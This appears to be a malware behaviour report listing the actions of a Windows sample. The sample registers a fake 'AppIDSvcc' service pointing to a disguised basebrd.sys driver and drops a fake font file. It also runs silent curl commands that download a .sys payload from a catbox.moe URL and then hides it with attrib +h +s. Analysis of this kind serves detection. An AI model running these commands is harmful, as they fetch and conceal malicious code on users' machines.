Technical Information
- [HKLM\SYSTEM\CurrentControlSet\Services\AppIDSvcc] 'ImagePath' = '%WINDIR%\Branding\Basebrd\basebrd.sys'
- 'AppIDSvcc' %WINDIR%\Branding\Basebrd\basebrd.sys
- %WINDIR%\fonts\fa-solid-900.ttf
- nul
- <Full path to file>
- from <Full path to file> to %TEMP%\<File name>.exe.bak
- 'fi###.catbox.moe':443
- 'fi###.catbox.moe':443
- DNS ASK fi###.catbox.moe
- '<SYSTEM32>\cmd.exe' /c cls
- '<SYSTEM32>\cmd.exe' /c curl --silent https://files.catbox.moe/4jdffy.sys --output %WINDIR%\Branding\Basebrd\basebrd.sys >nul 2>&1
- '<SYSTEM32>\curl.exe' --silent https://files.catbox.moe/4jdffy.sys --output %WINDIR%\Branding\Basebrd\basebrd.sys
- '<SYSTEM32>\cmd.exe' /c attrib +h +s %WINDIR%\Branding\Basebrd\basebrd.sys >nul 2>&1
- '<SYSTEM32>\attrib.exe' +h +s %WINDIR%\Branding\Basebrd\basebrd.sys